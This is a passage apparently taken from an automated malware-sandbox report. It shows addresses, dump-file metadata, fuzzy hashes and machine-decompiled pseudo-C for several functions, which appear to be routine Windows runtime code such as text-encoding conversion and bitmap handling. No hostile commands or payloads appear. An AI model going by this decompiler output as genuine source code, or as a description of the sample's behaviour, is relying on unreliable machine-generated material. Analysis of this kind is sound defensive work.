                                          0x03414deb
                                          0x03414df1
                                          0x03414df8
                                          0x03414dfe
                                          0x03414e03
                                          0x03414e05
                                          0x03414e17
                                          0x03414e07
                                          0x03414e10
                                          0x03414e10
                                          0x03414e1c
                                          0x03414e1f
                                          0x03414e35
                                          0x03414e35
                                          0x03414e1f
                                          0x03414df8
                                          0x033d04f1
                                          0x033d04fa
                                          0x03414e3f
                                          0x03414e47
                                          0x03414e5b
                                          0x03414e61
                                          0x03414e67
                                          0x03414e69
                                          0x03414e71
                                          0x03414e73
                                          0x033d0500
                                          0x033d0500
                                          0x033d0500
                                          0x033d04fa
                                          0x033d0508
                                          0x033d051d
                                          0x033d051d
                                          0x033d051f
                                          0x033d0524
                                          0x00000000
                                          0x033d0524
                                          0x033d0515
                                          0x033d0517
                                          0x03414e7a
                                          0x03414e7c
                                          0x00000000
                                          0x00000000
                                          0x03414e85
                                          0x00000000
                                          0x03414e85
                                          0x00000000
                                          0x033d0517

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 772f98bb6a50ba6fd66aa9f5322f108ddd32de6ec971e9343f0541f1009bfec0
                                          • Instruction ID: cc9da4d1ae8f34e18cb1e2c71ae7764cdcff38128913b488ddc64c24a2fd5106
                                          • Opcode Fuzzy Hash: 772f98bb6a50ba6fd66aa9f5322f108ddd32de6ec971e9343f0541f1009bfec0
                                          • Instruction Fuzzy Hash: 90914A72E007149FDF25DB69DC84BAEBBB8AB01B14F0A0266E911AF3D0D7749D40CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033DEBB0, Relevance: .2, Instructions: 250COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033DEBB0(signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed short* _a16, unsigned int _a20) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				intOrPtr _t42;
				unsigned int _t43;
				unsigned int _t50;
				signed char _t56;
				signed char _t60;
				signed int _t63;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				unsigned int _t82;
				signed int _t87;
				signed int _t91;
				signed short _t96;
				signed short* _t98;
				signed char _t100;
				signed int* _t102;
				signed short* _t105;
				intOrPtr _t106;
				signed int _t108;
				signed int* _t110;
				void* _t113;
				signed int _t115;
				signed short* _t117;
				signed int _t118;

				_t98 = _a16;
				_t87 = 0;
				_v16 = 0;
				if(_t98 == 0) {
					return 0xc00000f2;
				}
				_t110 = _a4;
				if(_t110 == 0) {
					if(_a12 == 0) {
						_t42 = 0xc000000d;
					} else {
						_t42 = E033DED1A(_t98, _a20, _a12);
					}
					L19:
					return _t42;
				}
				_t43 = _a20;
				if((_t43 & 0x00000001) != 0) {
					_t42 = 0xc00000f3;
					goto L19;
				} else {
					_t102 = _t110;
					_t105 =  &(_t98[_t43 >> 1]);
					_v8 = _t105;
					_v12 = _a8 + _t110;
					L4:
					while(1) {
						L4:
						while(1) {
							L4:
							if(_t98 >= _t105) {
								if(_t87 == 0) {
									L17:
									_t106 = _v16;
									L18:
									_t42 = _t106;
									 *_a12 = _t102 - _a4;
									goto L19;
								}
								L8:
								_t13 = _t87 - 0xd800; // -55295
								if(_t13 <= 0x7ff) {
									_v16 = 0x107;
									_t87 = 0xfffd;
								}
								_t113 = 1;
								if(_t87 > 0x7f) {
									if(_t87 > 0x7ff) {
										if(_t87 > 0xffff) {
											_t113 = 2;
										}
										_t113 = _t113 + 1;
									}
									_t113 = _t113 + 1;
								}
								if(_t102 > _v12 - _t113) {
									_t106 = 0xc0000023;
									goto L18;
								} else {
									if(_t87 > 0x7f) {
										_t50 = _t87;
										if(_t87 > 0x7ff) {
											if(_t87 > 0xffff) {
												 *_t102 = _t50 >> 0x00000012 | 0x000000f0;
												_t102 =  &(_t102[0]);
												_t56 = _t87 >> 0x0000000c & 0x0000003f | 0x00000080;
											} else {
												_t56 = _t50 >> 0x0000000c | 0x000000e0;
											}
											 *_t102 = _t56;
											_t102 =  &(_t102[0]);
											_t60 = _t87 >> 0x00000006 & 0x0000003f | 0x00000080;
										} else {
											_t60 = _t50 >> 0x00000006 | 0x000000c0;
										}
										 *_t102 = _t60;
										_t102 =  &(_t102[0]);
										_t87 = _t87 & 0x0000003f | 0x00000080;
									}
									 *_t102 = _t87;
									_t102 =  &(_t102[0]);
									_t63 = _t105 - _t98 >> 1;
									_t115 = _v12 - _t102;
									if(_t63 > 0xd) {
										if(_t115 < _t63) {
											_t63 = _t115;
										}
										_t22 = _t63 - 5; // -5
										_t117 =  &(_t98[_t22]);
										if(_t98 < _t117) {
											do {
												_t91 =  *_t98 & 0x0000ffff;
												_t100 =  &(_t98[1]);
												if(_t91 > 0x7f) {
													L58:
													if(_t91 > 0x7ff) {
														_t38 = _t91 - 0xd800; // -55296
														if(_t38 <= 0x7ff) {
															if(_t91 > 0xdbff) {
																_t98 = _t100 - 2;
																break;
															}
															_t108 =  *_t100 & 0x0000ffff;
															_t98 = _t100 + 2;
															_t39 = _t108 - 0xdc00; // -54273
															if(_t39 > 0x3ff) {
																_t98 = _t98 - 4;
																break;
															}
															_t91 = (_t91 << 0xa) + 0xfca02400 + _t108;
															 *_t102 = _t91 >> 0x00000012 | 0x000000f0;
															_t102 =  &(_t102[0]);
															_t73 = _t91 & 0x0003f000 | 0x00080000;
															L65:
															_t117 = _t117 - 2;
															 *_t102 = _t73 >> 0xc;
															_t102 =  &(_t102[0]);
															_t77 = _t91 & 0x00000fc0 | 0x00002000;
															L66:
															 *_t102 = _t77 >> 6;
															_t117 = _t117 - 2;
															_t102[0] = _t91 & 0x0000003f | 0x00000080;
															_t102 =  &(_t102[0]);
															goto L30;
														}
														_t73 = _t91 | 0x000e0000;
														goto L65;
													}
													_t77 = _t91 | 0x00003000;
													goto L66;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												if((_t100 & 0x00000002) != 0) {
													_t91 =  *_t100 & 0x0000ffff;
													_t100 = _t100 + 2;
													if(_t91 > 0x7f) {
														goto L58;
													}
													 *_t102 = _t91;
													_t102 =  &(_t102[0]);
												}
												if(_t100 >= _t117) {
													break;
												} else {
													goto L28;
												}
												while(1) {
													L28:
													_t80 =  *(_t100 + 4);
													_t96 =  *_t100;
													_v20 = _t80;
													if(((_t80 | _t96) & 0xff80ff80) != 0) {
														break;
													}
													_t82 = _v20;
													_t100 = _t100 + 8;
													 *_t102 = _t96;
													_t102[0] = _t82;
													_t102[0] = _t96 >> 0x10;
													_t102[0] = _t82 >> 0x10;
													_t102 =  &(_t102[1]);
													if(_t100 < _t117) {
														continue;
													}
													goto L30;
												}
												_t91 = _t96 & 0x0000ffff;
												_t100 = _t100 + 2;
												if(_t91 > 0x7f) {
													goto L58;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												L30:
											} while (_t98 < _t117);
											_t105 = _v8;
										}
										goto L32;
									} else {
										if(_t115 < _t63) {
											L32:
											_t87 = 0;
											continue;
										}
										while(_t98 < _t105) {
											_t87 =  *_t98 & 0x0000ffff;
											_t98 =  &(_t98[1]);
											if(_t87 > 0x7f) {
												L7:
												_t12 = _t87 - 0xd800; // -55290
												if(_t12 <= 0x3ff) {
													goto L4;
												}
												goto L8;
											}
											 *_t102 = _t87;
											_t102 =  &(_t102[0]);
										}
										goto L17;
									}
								}
							}
							_t118 =  *_t98 & 0x0000ffff;
							if(_t87 != 0) {
								_t36 = _t118 - 0xdc00; // -56314
								if(_t36 <= 0x3ff) {
									_t87 = (_t87 << 0xa) + 0xfca02400 + _t118;
									_t98 =  &(_t98[1]);
								}
								goto L8;
							}
							_t87 = _t118;
							_t98 =  &(_t98[1]);
							goto L7;
						}
					}
				}
			}































                                          0x033debb8
                                          0x033debbf
                                          0x033debc1
                                          0x033debc6
                                          0x00000000
                                          0x0341b6d6
                                          0x033debcd
                                          0x033debd2
                                          0x033dec95
                                          0x0341b6e0
                                          0x033dec9b
                                          0x033deca1
                                          0x033deca1
                                          0x033dec89
                                          0x00000000
                                          0x033dec89
                                          0x033debd8
                                          0x033debdd
                                          0x0341b6ea
                                          0x00000000
                                          0x033debe3
                                          0x033debe5
                                          0x033debe7
                                          0x033debef
                                          0x033debf2
                                          0x00000000
                                          0x033debf5
                                          0x00000000
                                          0x033debf5
                                          0x033debf5
                                          0x033debf7
                                          0x0341b6f6
                                          0x033dec7c
                                          0x033dec7c
                                          0x033dec7f
                                          0x033dec82
                                          0x033dec87
                                          0x00000000
                                          0x033dec87
                                          0x033dec1a
                                          0x033dec1a
                                          0x033dec25
                                          0x0341b725
                                          0x0341b72c
                                          0x0341b72c
                                          0x033dec2d
                                          0x033dec31
                                          0x0341b73c
                                          0x0341b744
                                          0x0341b748
                                          0x0341b748
                                          0x0341b749
                                          0x0341b749
                                          0x0341b74a
                                          0x0341b74a
                                          0x033dec3e
                                          0x0341b860
                                          0x00000000
                                          0x033dec44
                                          0x033dec47
                                          0x0341b750
                                          0x0341b758
                                          0x0341b767
                                          0x0341b775
                                          0x0341b77c
                                          0x0341b77f
                                          0x0341b769
                                          0x0341b76c
                                          0x0341b76c
                                          0x0341b781
                                          0x0341b788
                                          0x0341b78b
                                          0x0341b75a
                                          0x0341b75d
                                          0x0341b75d
                                          0x0341b78d
                                          0x0341b792
                                          0x0341b793
                                          0x0341b793
                                          0x033dec54
                                          0x033dec56
                                          0x033dec57
                                          0x033dec59
                                          0x033dec5e
                                          0x033decaa
                                          0x033ded16
                                          0x033ded16
                                          0x033decac
                                          0x033decaf
                                          0x033decb4
                                          0x033decb6
                                          0x033decb6
                                          0x033decb9
                                          0x033decbf
                                          0x0341b7c1
                                          0x0341b7c8
                                          0x0341b7d3
                                          0x0341b7db
                                          0x0341b7ec
                                          0x0341b858
                                          0x00000000
                                          0x0341b858
                                          0x0341b7ee
                                          0x0341b7f1
                                          0x0341b7f4
                                          0x0341b7ff
                                          0x0341b850
                                          0x00000000
                                          0x0341b850
                                          0x0341b80a
                                          0x0341b813
                                          0x0341b81c
                                          0x0341b81d
                                          0x0341b822
                                          0x0341b825
                                          0x0341b828
                                          0x0341b831
                                          0x0341b832
                                          0x0341b837
                                          0x0341b840
                                          0x0341b842
                                          0x0341b845
                                          0x0341b848
                                          0x00000000
                                          0x0341b848
                                          0x0341b7df
                                          0x00000000
                                          0x0341b7df
                                          0x0341b7cc
                                          0x00000000
                                          0x0341b7cc
                                          0x033decc5
                                          0x033decc7
                                          0x033deccb
                                          0x0341b79b
                                          0x0341b79e
                                          0x0341b7a4
                                          0x00000000
                                          0x00000000
                                          0x0341b7a6
                                          0x0341b7a8
                                          0x0341b7a8
                                          0x033decd3
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033decd5
                                          0x033decd5
                                          0x033decd5
                                          0x033decd8
                                          0x033decda
                                          0x033dece4
                                          0x00000000
                                          0x00000000
                                          0x033decea
                                          0x033deced
                                          0x033decf0
                                          0x033decf2
                                          0x033decfb
                                          0x033decfe
                                          0x033ded01
                                          0x033ded06
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033ded06
                                          0x0341b7ae
                                          0x0341b7b1
                                          0x0341b7b7
                                          0x00000000
                                          0x00000000
                                          0x0341b7b9
                                          0x0341b7bb
                                          0x033ded08
                                          0x033ded08
                                          0x033ded0c
                                          0x033ded0c
                                          0x00000000
                                          0x033dec60
                                          0x033dec62
                                          0x033ded0f
                                          0x033ded0f
                                          0x00000000
                                          0x033ded0f
                                          0x033dec68
                                          0x033dec6c
                                          0x033dec6f
                                          0x033dec75
                                          0x033dec0d
                                          0x033dec0d
                                          0x033dec18
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033dec18
                                          0x033dec77
                                          0x033dec79
                                          0x033dec79
                                          0x00000000
                                          0x033dec68
                                          0x033dec5e
                                          0x033dec3e
                                          0x033debfd
                                          0x033dec02
                                          0x0341b701
                                          0x0341b70c
                                          0x0341b71b
                                          0x0341b71d
                                          0x0341b71d
                                          0x00000000
                                          0x0341b70c
                                          0x033dec08
                                          0x033dec0a
                                          0x00000000
                                          0x033dec0a
                                          0x033debf5
                                          0x033debf5

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                          • Instruction ID: f14a4374cd2b6e58fcc3de46a5ed573ef183f688cecf55eddd1f9130a83ac4f9
                                          • Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                          • Instruction Fuzzy Hash: A0813537A086568FEB21CE6CD8C027EBF58EF52600B2C46BBD8528F741C325D856D795
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03471D55, Relevance: .2, Instructions: 226COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E03471D55(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t97;
				signed int _t101;
				signed int _t112;
				unsigned int _t113;
				signed int _t121;
				signed int _t128;
				signed int _t130;
				signed char _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t149;
				signed int _t150;
				void* _t154;
				signed int* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				intOrPtr _t171;
				signed int _t172;
				void* _t175;
				signed int* _t178;
				signed int _t179;
				signed int _t180;
				signed char _t181;
				signed char _t183;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				void* _t191;
				void* _t197;

				_t137 = __ecx;
				_push(0x64);
				_push(0x3481070);
				E033FD08C(__ebx, __edi, __esi);
				 *(_t191 - 0x24) = __edx;
				 *((intOrPtr*)(_t191 - 0x20)) = __ecx;
				 *((intOrPtr*)(_t191 - 0x38)) = __ecx;
				_t135 = 0;
				 *(_t191 - 0x40) = 0;
				_t171 =  *((intOrPtr*)(__ecx + 0xc));
				_t189 =  *(__ecx + 8);
				 *(_t191 - 0x28) = _t189;
				 *((intOrPtr*)(_t191 - 0x3c)) = _t171;
				 *(_t191 - 0x50) = _t189;
				_t187 = __edx << 0xf;
				 *(_t191 - 0x4c) = _t187;
				_t190 = 0x8000;
				 *(_t191 - 0x34) = 0x8000;
				_t172 = _t171 - _t187;
				if(_t172 <= 0x8000) {
					_t190 = _t172;
					 *(_t191 - 0x34) = _t172;
				}
				 *(_t191 - 0x68) = _t135;
				 *(_t191 - 0x64) = _t135;
				L3:
				while(1) {
					if( *(_t191 + 8) != 0) {
						L22:
						 *(_t191 + 8) = _t135;
						E0347337F(_t137, 1, _t191 - 0x74);
						_t97 =  *((intOrPtr*)(_t191 - 0x20));
						_t175 =  *(_t97 + 0x14);
						 *(_t191 - 0x58) = _t175;
						_t139 = _t97 + 0x14;
						 *(_t191 - 0x44) = _t139;
						_t197 = _t175 - 0xffffffff;
						if(_t197 == 0) {
							 *_t139 =  *(_t191 - 0x24);
							E034733B6(_t191 - 0x74);
							 *(_t191 - 0x40) = 1;
							_t60 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t101 =  *_t60;
							_t141 =  *(_t191 - 0x24);
							asm("bt [eax], ecx");
							_t103 = (_t101 & 0xffffff00 | __eflags > 0x00000000) & 0x000000ff;
							if(__eflags == 0) {
								goto L41;
							} else {
								_t103 = _t187 - 1 + _t190;
								__eflags = _t187 - 1 + _t190 -  *((intOrPtr*)(_t191 - 0x3c));
								if(_t187 - 1 + _t190 >=  *((intOrPtr*)(_t191 - 0x3c))) {
									goto L41;
								} else {
									__eflags = _t190 - 1;
									if(__eflags > 0) {
										_t143 =  *(_t191 - 0x28);
										_t178 = _t143 + (_t187 >> 5) * 4;
										_t144 = _t143 + (_t187 - 1 + _t190 >> 5) * 4;
										 *(_t191 - 0x50) = _t144;
										_t112 =  *_t178;
										 *(_t191 - 0x54) = _t112;
										_t113 = _t112 | 0xffffffff;
										__eflags = _t178 - _t144;
										if(_t178 != _t144) {
											_t103 = _t113 << _t187;
											__eflags =  *_t178 & _t103;
											if(( *_t178 & _t103) != 0) {
												goto L41;
											} else {
												_t103 =  *(_t191 - 0x50);
												while(1) {
													_t178 =  &(_t178[1]);
													__eflags = _t178 - _t103;
													if(_t178 == _t103) {
														break;
													}
													__eflags =  *_t178 - _t135;
													if( *_t178 != _t135) {
														goto L41;
													} else {
														continue;
													}
													goto L42;
												}
												_t103 = (_t103 | 0xffffffff) >>  !(_t187 - 1 + _t190);
												__eflags = _t103;
												_t149 =  *_t178;
												goto L38;
											}
										} else {
											_t154 = 0x20;
											_t103 = _t113 >> _t154 - _t190 << _t187;
											_t149 =  *(_t191 - 0x54);
											L38:
											_t150 = _t149 & _t103;
											__eflags = _t150;
											asm("sbb cl, cl");
											_t135 =  ~_t150 + 1;
											_t141 =  *(_t191 - 0x24);
											goto L39;
										}
									} else {
										if(__eflags != 0) {
											goto L41;
										} else {
											_t103 =  *(_t191 - 0x28);
											asm("bt [eax], edi");
											if(__eflags >= 0) {
												L40:
												_t136 =  *((intOrPtr*)(_t191 - 0x20));
												asm("lock btr [eax], ecx");
												 *((intOrPtr*)(_t191 - 0x60)) = (_t141 << 0xc) +  *((intOrPtr*)(_t136 + 8));
												 *((intOrPtr*)(_t191 - 0x5c)) = 0x1000;
												_push(0x4000);
												_push(_t191 - 0x5c);
												_push(_t191 - 0x60);
												_push(0xffffffff);
												_t103 = E033E96E0();
											} else {
												L39:
												__eflags = _t135;
												if(_t135 == 0) {
													goto L41;
												} else {
													goto L40;
												}
											}
										}
									}
								}
							}
						} else {
							E034733B6(_t191 - 0x74);
							_t172 = _t191 - 0x58;
							E033DE18B( *(_t191 - 0x44), _t172, 4, _t135,  *0x3495880);
							_t51 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t121 =  *_t51;
							asm("bt [eax], ecx");
							_t103 = (_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff;
							if(((_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff) == 0) {
								goto L41;
							} else {
								_t137 =  *((intOrPtr*)(_t191 - 0x20));
								continue;
							}
						}
					} else {
						 *(_t191 - 4) = _t135;
						_t103 = _t187 - 1 + _t190;
						 *(_t191 - 0x30) = _t103;
						if(_t103 <  *((intOrPtr*)(_t191 - 0x3c))) {
							__eflags = _t190 - 1;
							if(__eflags > 0) {
								_t179 =  *(_t191 - 0x28);
								_t161 = _t179 + (_t187 >> 5) * 4;
								 *(_t191 - 0x2c) = _t161;
								_t128 = _t179 + ( *(_t191 - 0x30) >> 5) * 4;
								 *(_t191 - 0x44) = _t128;
								_t180 =  *_t161;
								__eflags = _t161 - _t128;
								if(_t161 != _t128) {
									_t103 = (_t128 | 0xffffffff) << _t187;
									__eflags = _t103 & _t180;
									if((_t103 & _t180) != 0) {
										goto L5;
									} else {
										_t130 =  *(_t191 - 0x2c);
										_t164 =  *(_t191 - 0x44);
										while(1) {
											_t130 = _t130 + 4;
											 *(_t191 - 0x2c) = _t130;
											_t180 =  *_t130;
											__eflags = _t130 - _t164;
											if(_t130 == _t164) {
												break;
											}
											__eflags = _t180;
											if(_t180 == 0) {
												continue;
											} else {
												goto L5;
											}
											goto L19;
										}
										_t103 = (_t130 | 0xffffffff) >>  !( *(_t191 - 0x30));
										__eflags = _t103;
										goto L17;
									}
								} else {
									_t167 = 0x20;
									_t103 = (_t128 | 0xffffffff) >> _t167 - _t190 << _t187;
									L17:
									_t183 =  ~(_t180 & _t103);
									asm("sbb dl, dl");
									goto L18;
								}
							} else {
								if(__eflags != 0) {
									goto L5;
								} else {
									_t103 =  *(_t191 - 0x28);
									asm("bt [eax], edi");
									_t183 =  ~(_t172 & 0xffffff00 | __eflags > 0x00000000);
									asm("sbb dl, dl");
									L18:
									_t181 = _t183 + 1;
									__eflags = _t181;
								}
							}
						} else {
							L5:
							_t181 = _t135;
						}
						L19:
						 *(_t191 - 0x19) = _t181;
						_t163 = _t181 & 0x000000ff;
						 *(_t191 - 0x48) = _t163;
						 *(_t191 - 4) = 0xfffffffe;
						if(_t163 == 0) {
							L41:
							_t136 =  *((intOrPtr*)(_t191 - 0x20));
						} else {
							_t137 =  *((intOrPtr*)(_t191 - 0x20));
							goto L22;
						}
					}
					L42:
					__eflags =  *(_t191 - 0x40);
					if( *(_t191 - 0x40) != 0) {
						_t91 = _t136 + 0x14; // 0x14
						_t142 = _t91;
						 *_t91 = 0xffffffff;
						__eflags = 0;
						asm("lock or [eax], edx");
						_t103 = E033DDFDF(_t91, 1, _t142);
					}
					return E033FD0D1(_t103);
				}
			}





































                                          0x03471d55
                                          0x03471d55
                                          0x03471d57
                                          0x03471d5c
                                          0x03471d63
                                          0x03471d66
                                          0x03471d69
                                          0x03471d6c
                                          0x03471d6e
                                          0x03471d71
                                          0x03471d74
                                          0x03471d77
                                          0x03471d7a
                                          0x03471d7d
                                          0x03471d82
                                          0x03471d85
                                          0x03471d88
                                          0x03471d8d
                                          0x03471d90
                                          0x03471d94
                                          0x03471d96
                                          0x03471d98
                                          0x03471d98
                                          0x03471d9b
                                          0x03471d9e
                                          0x00000000
                                          0x03471da1
                                          0x03471da5
                                          0x03471e78
                                          0x03471e78
                                          0x03471e82
                                          0x03471e87
                                          0x03471e8a
                                          0x03471e8d
                                          0x03471e92
                                          0x03471e95
                                          0x03471e98
                                          0x03471e9b
                                          0x03471ede
                                          0x03471ee3
                                          0x03471ee8
                                          0x03471ef2
                                          0x03471ef2
                                          0x03471ef5
                                          0x03471ef8
                                          0x03471efe
                                          0x03471f03
                                          0x00000000
                                          0x03471f09
                                          0x03471f0c
                                          0x03471f0e
                                          0x03471f11
                                          0x00000000
                                          0x03471f17
                                          0x03471f17
                                          0x03471f1a
                                          0x03471f31
                                          0x03471f34
                                          0x03471f3f
                                          0x03471f42
                                          0x03471f45
                                          0x03471f47
                                          0x03471f4a
                                          0x03471f4d
                                          0x03471f4f
                                          0x03471f63
                                          0x03471f65
                                          0x03471f67
                                          0x00000000
                                          0x03471f69
                                          0x03471f69
                                          0x03471f72
                                          0x03471f72
                                          0x03471f75
                                          0x03471f77
                                          0x00000000
                                          0x00000000
                                          0x03471f6e
                                          0x03471f70
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03471f70
                                          0x03471f83
                                          0x03471f83
                                          0x03471f85
                                          0x00000000
                                          0x03471f85
                                          0x03471f51
                                          0x03471f53
                                          0x03471f5a
                                          0x03471f5c
                                          0x03471f87
                                          0x03471f87
                                          0x03471f87
                                          0x03471f8b
                                          0x03471f8d
                                          0x03471f90
                                          0x00000000
                                          0x03471f90
                                          0x03471f1c
                                          0x03471f1c
                                          0x00000000
                                          0x03471f22
                                          0x03471f22
                                          0x03471f25
                                          0x03471f28
                                          0x03471f97
                                          0x03471f97
                                          0x03471f9d
                                          0x03471fa7
                                          0x03471faa
                                          0x03471fb1
                                          0x03471fb9
                                          0x03471fbd
                                          0x03471fbe
                                          0x03471fc0
                                          0x03471f2a
                                          0x03471f93
                                          0x03471f93
                                          0x03471f95
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03471f95
                                          0x03471f28
                                          0x03471f1c
                                          0x03471f1a
                                          0x03471f11
                                          0x03471e9d
                                          0x03471ea0
                                          0x03471eae
                                          0x03471eb4
                                          0x03471ebc
                                          0x03471ebc
                                          0x03471ec2
                                          0x03471ec8
                                          0x03471ecd
                                          0x00000000
                                          0x03471ed3
                                          0x03471ed3
                                          0x00000000
                                          0x03471ed3
                                          0x03471ecd
                                          0x03471dab
                                          0x03471dab
                                          0x03471db1
                                          0x03471db3
                                          0x03471db9
                                          0x03471dbf
                                          0x03471dc2
                                          0x03471dda
                                          0x03471ddd
                                          0x03471de0
                                          0x03471de9
                                          0x03471dec
                                          0x03471def
                                          0x03471df1
                                          0x03471df3
                                          0x03471e0a
                                          0x03471e0c
                                          0x03471e0e
                                          0x00000000
                                          0x03471e10
                                          0x03471e10
                                          0x03471e13
                                          0x03471e16
                                          0x03471e16
                                          0x03471e19
                                          0x03471e1c
                                          0x03471e1e
                                          0x03471e20
                                          0x00000000
                                          0x00000000
                                          0x03471e22
                                          0x03471e24
                                          0x00000000
                                          0x03471e26
                                          0x00000000
                                          0x03471e26
                                          0x00000000
                                          0x03471e24
                                          0x03471e30
                                          0x03471e30
                                          0x00000000
                                          0x03471e30
                                          0x03471df5
                                          0x03471df7
                                          0x03471e01
                                          0x03471e32
                                          0x03471e34
                                          0x03471e36
                                          0x00000000
                                          0x03471e36
                                          0x03471dc4
                                          0x03471dc4
                                          0x00000000
                                          0x03471dc6
                                          0x03471dc6
                                          0x03471dc9
                                          0x03471dcf
                                          0x03471dd1
                                          0x03471e38
                                          0x03471e38
                                          0x03471e38
                                          0x03471e38
                                          0x03471dc4
                                          0x03471dbb
                                          0x03471dbb
                                          0x03471dbb
                                          0x03471dbb
                                          0x03471e3a
                                          0x03471e3a
                                          0x03471e3d
                                          0x03471e40
                                          0x03471e43
                                          0x03471e6f
                                          0x03471fc7
                                          0x03471fc7
                                          0x03471e75
                                          0x03471e75
                                          0x00000000
                                          0x03471e75
                                          0x03471e6f
                                          0x03471fca
                                          0x03471fca
                                          0x03471fce
                                          0x03471fd0
                                          0x03471fd0
                                          0x03471fd3
                                          0x03471fd9
                                          0x03471fde
                                          0x03471fe4
                                          0x03471fe4
                                          0x03471fee
                                          0x03471fee

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7e36e16ce89ffe3df47d7e9ee8b27eecdd0da18b5ac0a4d40c4e7b634deef12c
                                          • Instruction ID: b29a4aa80ab914b7d8bee8bf89242fd3f44d257a440d8a8484cefb032359dd97
                                          • Opcode Fuzzy Hash: 7e36e16ce89ffe3df47d7e9ee8b27eecdd0da18b5ac0a4d40c4e7b634deef12c
                                          • Instruction Fuzzy Hash: 45816D75E102198FCF18CFA8C8809EDB7B5BF49314B18425AE416AF3C5DB31A946CF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033AC600, Relevance: .2, Instructions: 225COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E033AC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x349d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E033B6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E033EB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x3497b9c; // 0x0
					_t74 = L033C4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E033E9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L033C77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
